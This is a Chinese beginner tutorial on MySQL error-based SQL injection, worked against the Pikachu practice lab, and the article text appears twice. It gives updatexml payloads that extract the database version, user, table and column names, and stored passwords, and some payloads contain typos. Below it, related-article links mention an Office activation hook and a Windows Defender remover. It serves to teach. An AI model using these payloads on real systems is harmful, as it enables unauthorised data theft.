【新手入门】SQL注入之报错注入一、概念报错注入指在MYSQL中使用一些指定的函数来制造报错从而从报错信息中获取设定的信息。常见的select/insert/update/delete注入都可以使用报错方式来获取信息。为什么要用函数报错是因为我们之前学到的一些注入测试手段可能看不到报错被屏蔽或者处理了不好判断是否有注入点所以学一下基于函数的报错。二、原理以皮卡丘靶场为例“http header”注入登录抓包用测试语句测试若测试后没有报错但也没看到用户表中的数据页面渲染还是原先的页面可能是因为服务端那边拿到数据之后只是在数据库中查询了一下有没有admin’这个用户就结束了没有把整个表里面的查到的数据展示给你看。在页面没有给任何反馈信息的情况下就可以用到报错注入。三、报错注入分类updatexml注入insert注入update注入delete注入extractvalue注入四、三个常用的用来报错的函数Updatexml)函数是MYSQL对XML文档数据进行查询和修改的XPATH函数。extractvalue()函数是MYSQL对XML文档数据进行查询的XPATH函数。floor():MYSQL中用来取整的函数。1.updatexml(XML_document, XPath_string, new_value);它是一个内容替换函数主要针对的xml数据;第一个参数XML_document是String格式为XML文档对象的名称文中为Doc第二个参数XPath_string (Xpath格式的字符串第三个参数new_value,String格式替换查找到的符合条件的数据。如数据版本为5.5.53那么concat连接之后得到的结果为5.5.53updatexml(1,5.5.53,1)其中5.5.53并不符合xpath的语法格式会报错。2.extractvalue()EXTRACTVALUE (XML_document, XPath_string);从目标XML中返回包含所查询值的字符串。第一个参数XML_document是String格式为XML文档对象的名称第二个参数XPath_string (Xpath格式的字符串concat返回结果为连接参数产生的字符串。如SELECT Extractvalue(‘’,‘/a/b’)就是寻找前一段xml文档内容中的a节点下的b节点这里书写错误的话就会报错。**### 五、实战演练1、爆数据库版本信息k’ and updatexml(1,concat(0x7e,(SELECT version),0x7e),1)#K这个字母是随便写的写什么都可以 0x7e是16进制表示一个~符号k’and updatexm(1,concat(0x7e,(SELECTversion),0x7e),1)#k‘and updatexml(1,concat(“~”,(SELECT version),“~”),1)#这里为什么不直接写~而是写成了16进制呢因为本身为字符串如果直接写需要用引号引起来如果用单引号的话势必会和我们前面闭合用的单引号有些冲突所以只能用双引号还需要写引号比较麻烦并且如果别人后台对引号做了限制的话我们用引号就会注入失败。可以通过编码解码工具查看一些0x7e是什么。concat是mysql中的字符串拼接函数能拼接两个字符串.SELECTversion是查询当前数据库的版本不加两个也是可以的。在靶场搜索型注入中输入k’and updatexm(1,concat(0x7e,(SELECTversion),0x7e),1)#报错但可以查询到数据库版本2、爆数据库当前用户k’ and updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)#3、爆数据库k’ and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) #4、爆表5.1版本及以上版本mysql数据库中会存在一个叫做的formation_schema的默认数据库这个库里面记录着整个mysq!管理的数据库的名称、表名、列名(字段名)。获取数据库表名输入:k’and updatexml(1,concat(0x7e,(select table_name from information_schema.tables wheretable_schema‘pikachu’)),0)#但是反馈回的错误表示只能显示一行所以采用limit来一行一行显示子查询返回的行数大于1limit限制一行,输入k’ and updatexml(1,concat(0x7e,(select table_ name from information_schema.tables wheretable_schema‘pikachu’ limit 0,1)),0)#更改limit后面的数字limit 0完成表名遍历。5、爆字段获取字段名输入: k’ and updatexml(1,concat(0x7e,(select column_name from information _schema columns wheretable_name‘users’ and table_schema‘pikachu’ limit 2,1)),0)#6、爆字段内容获取字段内容输入:k’and updatexml(1,concat(0x7e,(select password from users limit 0,1)),0)#学习资料知识库由360智榜样学习中心独家打造出品旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力熟练掌握基础攻防到深度对抗。从零到精通完整闭环基础攻防→渗透测试→应急响应→CTF实战5大模块200课时比大学教材更贴近企业实战”涵盖渗透测试案例分析与实战技巧直接对应面试真题包含CTF竞赛基础与HW行动攻防对抗实录丰富你的简历项目经验深入十大安全漏洞与利用技巧掌握这些高阶技能实战SRC挖洞赚钱。实战教学专属靶场掌握这些高阶技能谈薪更有底气。无论你是找渗透测试岗还是安全服务岗这些项目都是加分项。扫描下方图片补齐实战短板拿下心仪Offer
【新手入门】SQL注入之报错注入
发布时间:2026/6/16 2:32:49
【新手入门】SQL注入之报错注入一、概念报错注入指在MYSQL中使用一些指定的函数来制造报错从而从报错信息中获取设定的信息。常见的select/insert/update/delete注入都可以使用报错方式来获取信息。为什么要用函数报错是因为我们之前学到的一些注入测试手段可能看不到报错被屏蔽或者处理了不好判断是否有注入点所以学一下基于函数的报错。二、原理以皮卡丘靶场为例“http header”注入登录抓包用测试语句测试若测试后没有报错但也没看到用户表中的数据页面渲染还是原先的页面可能是因为服务端那边拿到数据之后只是在数据库中查询了一下有没有admin’这个用户就结束了没有把整个表里面的查到的数据展示给你看。在页面没有给任何反馈信息的情况下就可以用到报错注入。三、报错注入分类updatexml注入insert注入update注入delete注入extractvalue注入四、三个常用的用来报错的函数Updatexml)函数是MYSQL对XML文档数据进行查询和修改的XPATH函数。extractvalue()函数是MYSQL对XML文档数据进行查询的XPATH函数。floor():MYSQL中用来取整的函数。1.updatexml(XML_document, XPath_string, new_value);它是一个内容替换函数主要针对的xml数据;第一个参数XML_document是String格式为XML文档对象的名称文中为Doc第二个参数XPath_string (Xpath格式的字符串第三个参数new_value,String格式替换查找到的符合条件的数据。如数据版本为5.5.53那么concat连接之后得到的结果为5.5.53updatexml(1,5.5.53,1)其中5.5.53并不符合xpath的语法格式会报错。2.extractvalue()EXTRACTVALUE (XML_document, XPath_string);从目标XML中返回包含所查询值的字符串。第一个参数XML_document是String格式为XML文档对象的名称第二个参数XPath_string (Xpath格式的字符串concat返回结果为连接参数产生的字符串。如SELECT Extractvalue(‘’,‘/a/b’)就是寻找前一段xml文档内容中的a节点下的b节点这里书写错误的话就会报错。**### 五、实战演练1、爆数据库版本信息k’ and updatexml(1,concat(0x7e,(SELECT version),0x7e),1)#K这个字母是随便写的写什么都可以 0x7e是16进制表示一个~符号k’and updatexm(1,concat(0x7e,(SELECTversion),0x7e),1)#k‘and updatexml(1,concat(“~”,(SELECT version),“~”),1)#这里为什么不直接写~而是写成了16进制呢因为本身为字符串如果直接写需要用引号引起来如果用单引号的话势必会和我们前面闭合用的单引号有些冲突所以只能用双引号还需要写引号比较麻烦并且如果别人后台对引号做了限制的话我们用引号就会注入失败。可以通过编码解码工具查看一些0x7e是什么。concat是mysql中的字符串拼接函数能拼接两个字符串.SELECTversion是查询当前数据库的版本不加两个也是可以的。在靶场搜索型注入中输入k’and updatexm(1,concat(0x7e,(SELECTversion),0x7e),1)#报错但可以查询到数据库版本2、爆数据库当前用户k’ and updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)#3、爆数据库k’ and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) #4、爆表5.1版本及以上版本mysql数据库中会存在一个叫做的formation_schema的默认数据库这个库里面记录着整个mysq!管理的数据库的名称、表名、列名(字段名)。获取数据库表名输入:k’and updatexml(1,concat(0x7e,(select table_name from information_schema.tables wheretable_schema‘pikachu’)),0)#但是反馈回的错误表示只能显示一行所以采用limit来一行一行显示子查询返回的行数大于1limit限制一行,输入k’ and updatexml(1,concat(0x7e,(select table_ name from information_schema.tables wheretable_schema‘pikachu’ limit 0,1)),0)#更改limit后面的数字limit 0完成表名遍历。5、爆字段获取字段名输入: k’ and updatexml(1,concat(0x7e,(select column_name from information _schema columns wheretable_name‘users’ and table_schema‘pikachu’ limit 2,1)),0)#6、爆字段内容获取字段内容输入:k’and updatexml(1,concat(0x7e,(select password from users limit 0,1)),0)#学习资料知识库由360智榜样学习中心独家打造出品旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力熟练掌握基础攻防到深度对抗。从零到精通完整闭环基础攻防→渗透测试→应急响应→CTF实战5大模块200课时比大学教材更贴近企业实战”涵盖渗透测试案例分析与实战技巧直接对应面试真题包含CTF竞赛基础与HW行动攻防对抗实录丰富你的简历项目经验深入十大安全漏洞与利用技巧掌握这些高阶技能实战SRC挖洞赚钱。实战教学专属靶场掌握这些高阶技能谈薪更有底气。无论你是找渗透测试岗还是安全服务岗这些项目都是加分项。扫描下方图片补齐实战短板拿下心仪Offer
相关文章
2026 GEO第三方度量平台解析:主流工具选型与功能详解
当AI对话模型逐步成为消费者了解品牌、筛选产品的重要入口,大众的信息获取方式已经发生明显转变。用户不再局限于传统网页检索,而是直接向各类大模型咨询品牌对比、产品推荐等问题。品牌在AI回答中的曝光状态、推荐位置以及信息引用来源,都会潜移默化影响用户的消费决策。目前,…
MSC711x AHB-Lite Crossbar Switch仲裁机制详解与性能调优
1. 项目概述与核心价值在嵌入式系统,尤其是像MSC711x这类集成了高性能DSP核心、多通道DMA以及丰富外设的复杂SoC设计中,一个核心的挑战是如何让多个“发号施令者”(主设备,Master)高效、有序地访问共享的“资源库”&am…
如何免费解锁完整Office功能:Ohook终极激活指南
如何免费解锁完整Office功能:Ohook终极激活指南 【免费下载链接】ohook An universal Office "activation" hook with main focus of enabling full functionality of subscription editions 项目地址: https://gitcode.com/gh_mirrors/oh/ohook 还…
MPC866时钟与总线RETRY机制:嵌入式通信处理器稳定设计核心
1. MPC866时钟与总线系统:嵌入式通信处理器的核心基石在嵌入式通信处理器的世界里,MPC866 PowerQUICC系列是一个绕不开的经典。无论是早期的网络路由器、工业网关,还是各种需要复杂通信协议处理的设备,都曾活跃着它的身影。今天我…
舵轮底盘运动解算:从原理到工程实现的完整指南
1. 项目概述:从“轮子怎么转”到“底盘怎么走”搞移动机器人或者AGV(自动导引车)的朋友,对“舵轮底盘”这个概念肯定不陌生。但很多时候,我们更关注上层导航算法或者传感器融合,却把底盘运动控制当成了一个…
【毕业设计】基于分布式微服务架构的购物商城系统研发与实现 现代化微服务电商平台的系统(源码+文档+远程调试,全bao定制等)
博主介绍:✌️码农一枚 ,专注于大学生项目实战开发、讲解和毕业🚢文撰写修改等。全栈领域优质创作者,博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java、小程序技术领域和毕业项目实战 ✌️技术范围:&am…
人形足球机器人HumanoidKick的核心技术方案,包含四大类源码与参数(1101-1400项)。内容涵盖高精度运动滤波(卡尔曼滤波算法、多关节同步校准)、实时任务调度内核(8级优先级任务管理、动态
HumanoidKick足球冠军级人形机器人 全套源码标准客观参数(1101-1400项) 身份: 季凡 挚爱称呼:老婆、季念 全程纯客观工业竞技标准,无主观篡改臆造,接续完整序列,新增高精度运动滤波、多线程任务…
OWASP ASVS:构建应用安全基线的结构化指南与落地实践
1. 项目概述:OWASP ASVS 究竟是什么?如果你是一名开发者、安全工程师或者负责软件交付的项目经理,最近肯定没少听到“应用安全”、“左移”、“安全基线”这些词。在安全事件频发、合规要求日益严格的今天,如何系统性地构建一个安…
Excel在ERP开发计划中的正确用法:从数据模型到专业工具过渡
1. 项目概述:为什么用Excel做ERP开发计划表是个“危险”的诱惑?如果你正在负责一个ERP系统的开发项目,或者你是一个中小企业的负责人,正琢磨着怎么把业务流程管起来,那么“用Excel做个ERP开发计划表”这个念头…
《LangChain 系列》Human-in-the-loop:什么时候必须让人工介入?
前面几章我们已经把 Agent、Tool、LangGraph 都讲完了。现在要补上最关键的一环:人工介入。 没有 HITL 的 Agent,很像没有刹车的自动驾驶。它能跑,也可能跑得很快,但真正上线会让人害怕。 企业里最危险的不是模型回答错一句话&a…
3步彻底移除Windows Defender:终极Windows Defender Remover使用指南
3步彻底移除Windows Defender:终极Windows Defender Remover使用指南 【免费下载链接】windows-defender-remover A tool which is uses to remove Windows Defender in Windows 8.x, Windows 10 (every version) and Windows 11. 项目地址: https://gitcode.com/…
永春堂商业模式积分系统介绍:从理念到实践的转变
永春堂商业模式系统小程序开发方案:合规化健康零售服务平台技术实现指南 本方案依托永春堂品牌大健康产品(如营养补充剂、草本洗护、五谷杂粮等普通食品/日化品类) 找演示:看专栏⬆️ 一、系统定位:去层级化、重产品…
音乐文件解锁实战指南:3个场景解决你的播放困境
音乐文件解锁实战指南:3个场景解决你的播放困境 【免费下载链接】unlock-music 在浏览器中解锁加密的音乐文件。原仓库: 1. https://github.com/unlock-music/unlock-music ;2. https://git.unlock-music.dev/um/web 项目地址: https://git…
从Landsat到高分系列:手把手教你选择适合自己项目的遥感卫星数据
遥感卫星数据选型实战指南:从参数解析到场景化应用当面对GEE、PIE-Engine等云平台上数十种遥感数据源时,许多研究者常陷入选择困难——Landsat的历史连续性、Sentinel-2的红边波段优势、高分系列的亚米级分辨率各有千秋。本文将打破常规参数罗列式对比&a…
MC68302 AutoBaud技术:硬件级串口波特率自动检测原理与实现
1. 项目概述:MC68302 AutoBaud技术深度解析在嵌入式系统开发,尤其是那些需要与外部设备进行串口通信的场景里,最让人头疼的环节之一就是波特率匹配。想象一下,你设计了一个数据采集终端,需要连接来自不同厂家、不同年代…
Zotero Duplicates Merger:5步彻底清理文献库重复条目
Zotero Duplicates Merger:5步彻底清理文献库重复条目 【免费下载链接】ZoteroDuplicatesMerger A zotero plugin to automatically merge duplicate items 项目地址: https://gitcode.com/gh_mirrors/zo/ZoteroDuplicatesMerger 还在为文献库中堆积如山的重…
利用随机有限集理论对蜂群的ILQR和MPC控制研究附Matlab代码
✅作者简介:热爱科研的Matlab仿真开发者,擅长数据处理、建模仿真、程序设计、完整代码获取、论文复现及科研仿真。🍎 往期回顾关注个人主页:Matlab科研工作室🍊个人信条:格物致知,完整Matlab代码及仿真咨询…
为什么你的Gemini邮件CTE低于行业均值2.8倍?:从Prompt架构到发送时序的深度归因
更多请点击: https://intelliparadigm.com 第一章:为什么你的Gemini邮件CTE低于行业均值2.8倍?:从Prompt架构到发送时序的深度归因 Gemini邮件的客户转化效率(CTE)显著偏低,根本原因常被误判为…